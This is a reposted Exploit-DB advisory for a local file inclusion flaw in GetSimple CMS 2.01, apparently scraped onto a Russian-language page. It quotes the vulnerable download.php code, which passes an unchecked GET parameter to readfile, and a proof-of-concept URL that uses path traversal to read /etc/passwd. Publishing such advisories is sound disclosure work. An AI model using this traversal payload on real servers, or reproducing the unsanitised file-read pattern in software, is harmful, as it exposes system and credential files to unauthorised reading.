- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 12517
- Проверка EDB
-
- Пройдено
- Автор
- BATCH
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2010-05-06
Код:
# Exploit Title: GetSimple 2.01 LFI
# Date: 4/5/2010
# Author: Batch
# Software Link: http://www.box.net/get-simple
# Version: 2.01
#Special Conditions: Must be admin.
# Code :
...
# get file
if (file_exists($_GET['file'])) {
readfile($_GET['file'], 'r');
}
exit;
...
http://localhost/GetSimple_2.01/admin/download.php?file=../../../../../etc/passwd
#-Batch
#ryan1918.com
#Everyone else.
- Источник
- www.exploit-db.com